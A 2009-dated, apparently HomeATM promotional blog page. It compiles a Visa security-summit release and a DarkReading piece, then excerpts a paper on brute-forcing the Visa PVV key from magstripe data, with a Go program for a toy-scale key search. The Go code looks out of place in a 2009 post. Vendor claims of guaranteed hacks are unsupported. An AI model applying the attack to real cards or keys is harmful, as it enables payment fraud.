Monday, March 23, 2009

More Investment Needed to Secure Credit Cards

Media Center | Visa Corporate

Visa Calls for Maintaining Investment, Shared Responsibility at Global Security Summit

New Survey Shows Consumers Avoiding Retailers Who May Not Protect Data

Visa Inc. (NYSE: V) chief enterprise risk officer Ellen Richey told security experts today that payment card data fraud rates remain near historic lows despite economic woes and high-profile compromises, and called for continued industry investment, collaboration and innovation, three key components in keeping the electronic payment system secure in the future. She made her comments to a gathering of business, government, academic and law enforcement officials at Visa's Global Security Summit, its third cross-functional symposium on payment security, held in Washington, DC.

"Massive investments and innovative solutions have kept fraud rates near an all-time low," said Richey. "The best way to build on this track record is by having all players in the payment system share responsibility and maintain their investments in security - even during these times of economic challenge."

Richey also addressed recent security compromises by reminding the audience that compliance with the Payment Card Industry Data Security Standard (PCI DSS) continues to be the industry's best tool to guard against theft of cardholder data and the best protection for businesses against unwanted intrusions. She also added that PCI DSS validation is an annual, minimum requirement for organizations but that true compliance with PCI DSS is an ongoing effort requiring vigilance.

"PCI DSS remains an effective security tool when implemented properly - and remains the best defense against the loss of sensitive data. No compromised entity to date has been found to be in compliance with PCI DSS at the time of the breach," she said. (Editor's Note: Thus the importance of HomeATM achieving PCI 2.0 PED Certification...)

Reinforcing the need for vigilance on security at the merchant level, Visa released a new survey showing that many consumers are choosing to shop only with retailers they trust to protect their personal data. Of the 800 credit and debit cardholders surveyed February 3-5, 2009, 59% said they had decided not to make an online purchase at a particular web site because they did not trust that site. Another 49% said they had opted not to shop with a merchant they did not recognize, for fear of having their personal data stolen.

Echoing Richey's themes of shared responsibility and cooperation was summit keynote speaker Dave DeWalt, president and CEO of McAfee Inc., who called for better cross-border collaboration and for businesses to make security a priority through risk assessments, closing gaps, and being vigilant.

"Now more than ever, security is mission critical to all organizations," said DeWalt. "Compliance with mandates such as PCI DSS should not simply be a checklist item; instead organizations should always be vigilant and continuously assess their risks and exposure and implement strong security controls."

Massachusetts Attorney General Martha Coakley also provided a keynote address at the event and said that increased collaboration between government and the private sector is imperative to protect consumer data. She called on industry to make data security a commitment on par with protecting intellectual property and trade secrets.

"Privacy protection, safety and security is an ever-changing landscape as government, law enforcement, industry, and consumers seek to balance technological advances in society with traditional expectations of privacy and security," said Coakley. "Creating and implementing strategies and solutions to combat these problems will require thoughtful planning and commitment from decision makers in both the private and public sectors."

Richey conveyed four priorities she sees as critical for the future security of the payment industry, including:
  • Accelerate global data breach preparedness with greater PCI DSS compliance
  • Actively engage consumers in the process of protecting their data
  • Increase collaboration across the payment system to close security gaps and share critical information more quickly
  • Reduce the value of stolen data through investment in new authentication measures

Driving home the importance of empowering consumers to take a more active role in protecting their card accounts, Richey highlighted a Visa service to provide near real-time alerts and notifications when a registered Visa card is used for a purchase or cash withdrawal. In addition to providing cardholders a tool to track and manage their accounts, transaction alerts can also help limit the extent of potential fraud. If a cardholder receives a suspicious alert, they can immediately call their issuer.

"Visa's early-warning system can provide peace of mind and help protect consumers from card fraud at the crime's initial stage," Richey said. "A consumer who receives an alert would be able to make a simple phone call to stop fraud in its tracks."

Visa's transaction alerts and notifications service is commercially available today for Chase Visa cardholders with mobile devices powered by Android, the Open Handset Alliance's open source platform for mobile devices. The service will be rolled out to additional financial institutions and for additional mobile devices later this year.

Held in cooperation with the Economist Intelligence Unit, Visa's Global Security Summit was convened to discuss how payments system participants can collaborate to protect cardholders against current and emerging security threats. Five panels were assembled to cover topics related to innovations in payment security, strengthening e-commerce security, small business data protection, global executives' security priorities, and the world of hackers. A webcast of the summit can be viewed at

About Visa
Visa operates the world's largest retail electronic payments network providing processing services and payment product platforms. This includes consumer credit, debit, prepaid and commercial payments, which are offered under the Visa, Visa Electron, Interlink and PLUS brands. Visa enjoys unsurpassed acceptance around the world and Visa/PLUS is one of the world's largest global ATM networks, offering cash access in local currency in more than 170 countries. For more information, visit

Jay Hopkins for Visa
Tel.: +1-703-683-5004 ext. 107

Small Biz Being Targeted by Cybercriminals

Small Business: The New Black In Cybercrime Targets

Enticed by poor defenses of mom-and-pop shops, hackers turn away from hardened defenses of banks and large enterprises

By Tim Wilson  DarkReading

WASHINGTON, D.C. -- Visa Security Summit 2009 -- Hacking banks and large businesses? That's sooo 2008.

Hackers and computer criminals this year are taking a new aim -- directly at small and midsize businesses, according to experts who spoke here today at Visa's annual security event. The consensus: Smaller businesses offer a much more attractive target than larger enterprises that have steeled themselves with years of security spending and compliance efforts.

"As the security becomes better at large companies, the small business begins to look more and more enticing to computer criminals," said Charles Matthews, president of the International Council for Small Business, in a panel presentation here. "It's the path of least resistance."

Matthews quoted industry research that states small businesses are far less prepared to defend themselves against cyberattack. "Nearly one-fifth of small businesses don't even use antivirus software," he said. "Sixty percent don't use any encryption on their wireless links. Two-thirds of small businesses don't have a security plan in place. These numbers are both surprising and disturbing."

And many small businesses still don't know they are targets, according to Chris Gray, director of innovation policy at the Canadian Chamber of Commerce and another member of the panel. "According to a brief survey we conducted, about two-thirds of small and medium-sized businesses believe that large companies are the main target for cybercrime," he reported. "Yet 85 percent of the fraud we see in business occurs in small and medium-sized businesses."

Editor's Note: Small to Medium Internet Businesses can provide a dually authenticated, end-to-end encrypted payment solution for their e-shoppers. For these e-SMEs, PCI DSS compliance is costly, time-consuming and confusing. You can solve your compliance issues and eliminate the cost by employing HomeATM's PCI 2.0 PEDs. The cost is far less than achieving PCI 2.0 compliance on your own, and since we employ DUKPT key management techniques, the cardholder's data is NEVER transmitted. End result? Your e-business would be effectively removed from the burden of PCI DSS' scope. For more information, email us...

Continue the story at DarkReading

Make the "Hack You" Link...

You've heard of the F-Bomb, the H-Bomb and the F-Word. With the recent rash of Hacks (Heartland, RBS WorldPay and more coming) there's a new one...I call it the H-Word. It's Black Hat slang for Hack You!

Heartland knows what it feels like when a Black Hat says "Hack You!"  Suffice it to say their stock symbol might be HPY, but shareholders are not.  Why?  Again...two words.  Hack You!  So what's the safer approach to protecting your Online Debit (PIN) number?

A PCI 2.0 PED "certified" approach...or a soft(ware is the PVV?) approach? What's more readily hackable? Hardware or Software. It's not "hard" to make the "Hack-You"-Lynk...

Although the answer is an obvious one, never underestimate the impact of good marketing prowess. The EFT Networks may have fallen for a good sales pitch hook, line and sinker, but they should know better. They'll know soon enough...why a software-only approach to protecting a consumer's PIN is soft. My biggest concern is a breach, not competition. I don't want to see people's PINs hacked because it will affect the industry as a whole, and we are part of that industry. The writing is SO CLEARLY on the wall. I'd like to see it encrypted...

Since data is what's at stake here, we'll provide some.  

What follows are some excerpts from a paper called "Breaking VISA PIN" written by Luis Padilla Visdómine. If you're not a techie, you'll have to read it a little more slowly in order for it to properly digest. In the meantime, here's the meat and potatoes: A software approach WILL BE HACKED, PERIOD, END OF STORY, GUARANTEED. Many prominent industry insiders agree. HomeATM's CEO guarantees it will happen within 30 days of it going live. If it takes 60 or 90 days, don't hold it against him...he's only trying to help.

There's only one way to prevent a Black Hat attack resulting in the H-Word. You've got to fight fire with fire...in this case, with "another" H-Word...HomeATM. (bet you thought I was going to say Hardware, didn't you?...)

HomeATM reached the summit or PINNACLE of security with its recent PCI 2.0 certification. What does this mean?

It means that HomeATM's "SAFE-T-PIN" solution encrypts the entire transaction, beginning to end which should thus remove participating merchants from the scope of the PCI DSS as NO CARDHOLDER DATA is transmitted during the transaction.  What does THAT mean?

Considering that PCI DSS compliance is a costly process, that fact alone should result in considerable interest. Instead of paying tens of thousands, in some cases hundreds of thousands of dollars, an e-merchant could employ HomeATM's payment platform and be in like Flynn.

Additionally, since the HomeATM SAFE-T-PIN provides a "card present" environment, interchange morphs from the significantly higher "Card NOT Present" rates into a significantly lower "Card Present" rate. But we're not done yet. In addition to our solution removing our clients from the PCI DSS scope and lowering interchange to Card Present rates, we ALSO further reduce interchange by providing a true PIN-based transaction.

PIN based transactions, because of their inherent dual-authentication processing (What you have/Card and What you Know/PIN) enjoy a reduced interchange rate on top of the CP rate.  In effect, HomeATM could save giant e-tailers tens of millions of dollars on Interchange.  "Annually!"

On the flip side, considering that a "software" approach requires the cardholder to "type" their PAN (Primary Account Number) into a browser, e-tailers will still have to pay a "card not present" rate. So even if it isn't H'd in the first 90 days, Internet Retailers would still be paying a higher rate in return for the convenience of not having good security. But since the Internet Retailer is the one who is going to be liable when it is dot.hacked, they'll quickly learn they've been had.

Here are the excerpts:  To read his entire paper, click here

VISA PVV algorithm

One of the most common PIN algorithms is the VISA PIN Verification Value (PVV). The customer is given a PIN and a magnetic stripe card. Encoded in the magnetic stripe is a four-digit number, called the PVV. This number is a cryptographic signature of the PIN and other data related to the card. When a user enters his/her PIN, the ATM reads the magnetic stripe, encrypts and sends all this information to a central computer.

There a trial PVV is computed using the customer-entered PIN and the card information with a cryptographic algorithm. The trial PVV is compared with the PVV stored in the card; if they match, the central computer returns to the ATM authorization for the transaction.

Preparing the attack

A brute force attack consists of encrypting a TSP with known PVV using all possible encrypting keys and comparing each obtained PVV with the known PVV. When a match is found we have a candidate key. But how many keys do we have to try? As we said above the key is 64 bits long; this would mean we have to try 2^64 keys. However this is not true. Actually only 56 bits are effective in DES keys because one bit (the least significant) out of each octet was historically reserved as a checksum for the others; in practice those 8 bits (one for each of the 8 octets) are ignored.

Therefore the DES key space consists of 2^56 keys. If we try all these keys, will we find one and only one match, corresponding to the bank secret key? Certainly not. We will obtain many matching keys. This is because the PVV is only a small part (one fourth) of the DES output. Furthermore the PVV is degenerate because some of the digits (those between 0 and 5 after the last, seen from left to right, digit between 6 and 9) may come from a decimal digit or from a decimalized hexadecimal digit of the DES output. Thus many keys will produce a DES output which yields the same matching PVV.

The attack

Once we know we need five TSP-PVV pairs, how do we get them? Of course we need at least one card with known PIN, and due to the nature of the PVV algorithm, that's the only thing we need. With other PIN systems, such as IBM's, we would need five cards; however this is not necessary with the VISA PVV algorithm. We just have to read the magnetic stripe and then change the PIN four times, reading the card after each change.

It is necessary to read the magnetic stripe of the card to get the PVV and the encrypting key selector. You can buy a commercial magnetic stripe reader or make one yourself following the instructions you can find in the previous page and links therein. Once you have a reader, see this description of standard magnetic tracks to find out how to get the PVV from the data read. In that document the PVV field in tracks 1 and 2 is said to be five characters long, but actually the true PVV consists of the last four digits. The first of the five digits is the key selector. I have only seen cards with a value of 1 in this digit, which is consistent with the standard and with the secret key never having been compromised (and therefore they did not need to move to another key, changing the selector).

I did a simple C program, getpvvkey.c, to perform the attack. It consists of a loop to try all possible keys to encrypt the first TSP; if the derived PVV matches the true PVV a new TSP is tried, and so on until there is a mismatch, in which case the key is discarded and a new one is tried, or until the five derived PVVs match the corresponding true PVVs, in which case we can assume we got the bank secret key. However the loop goes on until it exhausts the key space. This is done to assure we find the true key, because there is a chance (although very low) that the first key found is a false positive.

It is expected the program would take a very long time to finish, and to minimize the risks of a power cut, computer hang, etc., it does checkpoints into the file getpvvkey.dat from time to time (the exact interval depends on the speed of the computer; it's around one hour for the fastest computers now in use). For the same reason, if a positive key is found it is written to the file getpvvkey.key. The program only displays one message at the beginning, the starting position taken from the checkpoint file if any; after that nothing more is displayed.

The DES algorithm is a key point in the program, it is therefore very important to optimize its speed. I tested several implementations: libdes, SSLeay, openssl, cryptlib, nss, libgcrypt, catacomb, libtomcrypt, cryptopp, ufc-crypt.

The DES functions of the first four are based on the same code by Eric Young, which is the one that performed best (it includes optimized C and x86 assembler code). Thus I chose libdes, which was the original implementation, and condensed all relevant code in the files encrypt.c (C version) and x86encrypt.s (x86 assembler version). The code is slightly modified to achieve some enhancements in a brute force attack: the initial permutation is a fixed common step in each TSP encryption and therefore can be done just once at the beginning. Another improvement is that I wrote a completely new setkey function (I called it nextkey) which is optimal for a brute force loop.

To get the program working you just have to type in the corresponding place five TSPs and their PVVs and then compile it. I have tested it only on UNIX platforms, using the makefile Makegetpvvkey to compile (use the command "make -f Makegetpvvkey"). It may compile on other systems but you may need to fix some things. Be sure that the definition of the type long64 corresponds to a 64-bit integer. In principle there is no dependence on the endianness of the processor. I have successfully compiled and run it on Pentium-Linux, Alpha-Tru64, Mips-Irix and Sparc-Solaris. If you do not have and do not want to install Linux (you don't know what you are missing ;-) you still have the choice to run Linux from CD and use my program; see my page running Linux without installing it.
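
The excerpts above describe the PVV computation (TSP, encryption, decimalization), why only 2^56 keys matter, why one PVV matches many keys, and the shape of the getpvvkey.c search loop. The following Go program is an added example written for this post, not Padilla's getpvvkey.c and not any Visa code: it implements the PVV calculation as the excerpt describes it (single DES on the TSP, then the decimal-first digit selection), checks that the DES parity bits really do not affect the result, counts how many PINs verify against one PVV, and runs the same "first pair, then the rest" search over a deliberately tiny key space. The PAN, PVK and PINs are constructed demo values; the search only varies the 14 effective bits of the last two key bytes so that it finishes in milliseconds instead of the 2^56 trials the real program needs.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
)

// tsp packs the 16-digit Transformed Security Parameter as BCD: rightmost 11
// PAN digits with the Luhn check digit dropped, 1-digit PVKI (key selector), PIN.
func tsp(pan, pvki, pin string) ([]byte, error) {
	if len(pan) < 12 || len(pvki) != 1 || len(pin) != 4 {
		return nil, fmt.Errorf("bad input lengths")
	}
	return hex.DecodeString(pan[len(pan)-12:len(pan)-1] + pvki + pin) // digits are valid hex
}

// decimalize takes decimal digits of the ciphertext hex left to right until
// four are found; if fewer exist it rescans taking a-f mapped to 0-5. That
// second pass is the "degenerate" PVV the excerpt describes.
func decimalize(ct string) string {
	out := make([]byte, 0, 4)
	for i := 0; i < len(ct) && len(out) < 4; i++ {
		if c := ct[i]; c >= '0' && c <= '9' {
			out = append(out, c)
		}
	}
	for i := 0; i < len(ct) && len(out) < 4; i++ {
		if c := ct[i]; c >= 'a' && c <= 'f' {
			out = append(out, c-'a'+'0')
		}
	}
	return string(out)
}

// pvv encrypts one TSP under the PVK and decimalizes. The excerpt assumes a
// single-DES PVK (a double-length PVK would use des.NewTripleDESCipher(A||B||A)).
// DES drops the low bit of each key byte in PC-1: flipping it leaves the PVV unchanged.
func pvv(key [8]byte, t []byte) string {
	blk, _ := des.NewCipher(key[:]) // only fails on a wrong key length
	var ct [8]byte
	blk.Encrypt(ct[:], t)
	return decimalize(hex.EncodeToString(ct[:]))
}

// matchingPINs counts PINs 0000-9999 that verify against one stored PVV.
func matchingPINs(key [8]byte, pan, pvki, stored string) (n int) {
	for p := 0; p < 10000; p++ {
		if t, _ := tsp(pan, pvki, fmt.Sprintf("%04d", p)); pvv(key, t) == stored {
			n++
		}
	}
	return n
}

// pair is one TSP/PVV pair read from a card with a known PIN (one card, PIN
// changed between stripe reads, as the excerpt describes); makePairs builds them.
type pair struct {
	t   []byte
	pvv string
}

func makePairs(key [8]byte, pan, pvki string, pins []string) (ps []pair) {
	for _, p := range pins {
		t, _ := tsp(pan, pvki, p)
		ps = append(ps, pair{t, pvv(key, t)})
	}
	return ps
}

// bruteForce is the excerpt's loop: test pair 1 for each key, go on to the next
// pair only on a match, and keep searching after a full match because the first
// hit may be a false positive. Demo varies only the 14 effective bits of bytes 6-7.
func bruteForce(base [8]byte, pairs []pair) (found [][8]byte) {
	for i := 0; i < 1<<14; i++ {
		k := base
		k[6], k[7] = byte((i>>7)<<1), byte((i&127)<<1) // parity bits stay zero
		ok := true
		for _, p := range pairs {
			if pvv(k, p.t) != p.pvv {
				ok = false
				break
			}
		}
		if ok {
			found = append(found, k)
		}
	}
	return found
}

func main() {
	pan, pvki := "4000123456789010", "1" // constructed demo data, not a real PAN or key
	key := [8]byte{0x13, 0x57, 0x9b, 0xdf, 0x24, 0x68, 0xac, 0xe0}
	pairs := makePairs(key, pan, pvki, []string{"1234", "5678", "0000", "9999", "4321"})
	fmt.Printf("PVV for PIN 1234: %s; PINs that verify against it: %d\n", pairs[0].pvv, matchingPINs(key, pan, pvki, pairs[0].pvv))
	base := key
	base[6], base[7] = 0, 0 // the demo search space must contain the true key
	c := bruteForce(base, pairs)
	fmt.Printf("candidate keys: %d; true key recovered: %v\n", len(c), len(c) == 1 && c[0] == key)
}
```

Two practitioner notes on this, both my own reasoning rather than the paper's. First, why five pairs: if a wrong key matched a 4-digit PVV with probability 10^-4, a full 2^56 search (about 7.2 x 10^16 keys) would leave roughly 7 false keys after four pairs but about 7 x 10^-4 after five, which is the "very low" false-positive chance the excerpt mentions; the degeneracy of the decimalization makes a collision somewhat more likely than 10^-4, so five is the minimum, not a comfortable margin. Second, the excerpt's 2^56 key space assumes a single-length PVK; the Visa method as deployed uses a double-length key with triple DES, which is why the program above parameterizes the cipher in one function and why the search in this demo is restricted to a toy subspace.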

E-Tailers Missed Out on $21 Billion

$21 Billion might not cover the bonuses at AIG but it's still a mighty big number...HomeATM can help bring those numbers back up by properly "securing" the transaction with their PCI 2.0 PED SAFE-T-PIN, the very first PCI certified PIN Entry Device designed for use on the web.

Javelin Strategy & Research in its latest research has stated that the volume of online sales decreased by $21 billion in 2008.

According to the survey results only 45% are satisfied with the quality of the merchandise sold online and the time of shipping, whereas 37% of consumers complained of late shipments and 28% of online customers found that the quality of the goods they received was below their expectations.

19% of Internet users said that they have cut their online spending and 12% of consumers stated that they stopped using online shopping services because of online fraudsters.

To motivate online shoppers the retailers use various strategies. So, according to Javelin Strategy & Research, the sellers assure users of the safety of their personal information (83%) (Editor's Note: how do they do that if the information isn't properly protected in the first place?), and guarantee price (79%), quality expectations (80%) and reimbursement.

Among other top promises are a zero liability against identity theft (81%) and stronger security at the store website (80%).

Source: eBillme blog